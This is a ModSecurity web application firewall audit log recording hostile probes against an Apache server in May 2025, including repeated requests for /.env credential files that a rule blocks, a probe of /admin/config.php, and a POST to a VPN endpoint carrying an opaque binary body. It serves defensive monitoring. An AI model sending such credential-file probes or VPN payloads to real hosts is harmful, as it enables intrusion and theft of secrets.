[02/May/2025:21:49:43 +0700] aBTbh6GyUvHV-cebb642IwAAAEw 103.236.140.4 36428 103.236.140.4 8181
--064c2c43-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; WAS-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept-Charset: utf-8
--064c2c43-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--064c2c43-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746197383813190 859 (- - -)
Stopwatch2: 1746197383813190 859; combined=350, p1=306, p2=0, p3=0, p4=0, p5=44, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--064c2c43-Z--
--80fdef48-A--
[02/May/2025:22:37:07 +0700] aBTmo_NNWdC6CAybkqMQdQAAAM4 103.236.140.4 36652 103.236.140.4 8181
--80fdef48-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.231.75.61
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.231.75.61
X-Forwarded-Proto: http
Connection: close
User-Agent: python-requests/2.32.3
Accept: */*
--80fdef48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--80fdef48-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746200227587268 831 (- - -)
Stopwatch2: 1746200227587268 831; combined=345, p1=302, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--80fdef48-Z--
--d316625f-A--
[02/May/2025:22:37:08 +0700] aBTmpBXwRgnphTBdhpRpzwAAAIE 103.236.140.4 36654 103.236.140.4 8181
--d316625f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.231.75.61
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.231.75.61
X-Forwarded-Proto: https
Connection: close
User-Agent: python-requests/2.32.3
Accept: */*
--d316625f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d316625f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746200228498237 738 (- - -)
Stopwatch2: 1746200228498237 738; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d316625f-Z--
--605df467-A--
[02/May/2025:23:06:54 +0700] aBTtnhXwRgnphTBdhpRqAQAAAIw 103.236.140.4 37062 103.236.140.4 8181
--605df467-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 139.59.132.8
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 139.59.132.8
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--605df467-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--605df467-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746202014131153 946 (- - -)
Stopwatch2: 1746202014131153 946; combined=354, p1=303, p2=0, p3=0, p4=0, p5=50, sr=83, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--605df467-Z--
--751fbe37-A--
[02/May/2025:23:13:10 +0700] aBTvFhXwRgnphTBdhpRqCgAAAJQ 103.236.140.4 37136 103.236.140.4 8181
--751fbe37-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 64.227.70.2
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 64.227.70.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--751fbe37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--751fbe37-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746202390135194 739 (- - -)
Stopwatch2: 1746202390135194 739; combined=308, p1=276, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--751fbe37-Z--
--63e4e95b-A--
[02/May/2025:23:20:53 +0700] aBTw5RXwRgnphTBdhpRqGwAAAI0 103.236.140.4 37252 103.236.140.4 8181
--63e4e95b-B--
GET /admin/config.php HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 87.106.86.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 87.106.86.89
X-Forwarded-Proto: http
Connection: close
User-Agent:
Accept: */*
--63e4e95b-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--63e4e95b-H--
Message: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "120"] [id "217240"] [rev "3"] [msg "COMODO WAF: Empty User Agent Header||103.236.140.4|F|5"] [data "REQUEST_HEADERS:User-Agent="] [severity "NOTICE"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1746202853796375 4057 (- - -)
Stopwatch2: 1746202853796375 4057; combined=2512, p1=427, p2=1988, p3=31, p4=37, p5=29, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--63e4e95b-Z--
--57ffbb64-A--
[02/May/2025:23:40:27 +0700] aBT1exXwRgnphTBdhpRqQgAAAIY 103.236.140.4 37408 103.236.140.4 8181
--57ffbb64-B--
POST /vpnsvc/connect.cgi HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 85.90.246.159
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 85.90.246.159
X-Forwarded-Proto: https
Connection: close
Content-Length: 1684
Content-Type: image/jpeg
X-SSL-VPN: 1
--57ffbb64-C--
GIF89aÈ 3 ò 674yhT€€€¯[³¨ÕÕÔÿÿÿ , È 3 þÜ4
Ake1O€ù`(Ždižhª®lëšKã%oV§éÒëÿÀ pÈŠÜ,œÆÇ1f$¢tJN±
aË%Ô¸I汚Ïèô+t …xü
nŸê5ï)j,
n\rˆzzoMw%qq/’•€"H}˜š|‚#kHp#}˜¨!‡‰µ‹|{<Ž#ž›®+ ¦¬›±Ã!±ž"ž®Å™ –¯Æ p¶¶[Že!½›Ë*žËÁáѧ©néÖ‚ÍÉÊÕÑ®½Ë¬´Ùs47vß<ÈšBN8L«
úêRÛ5ÓóÎÙ,r·@"èþ°aÇOì@~”öP6ƒ¨jyùwã(iU gŠ©RÅPqB‚1Ú´Vq¼ò'I>ï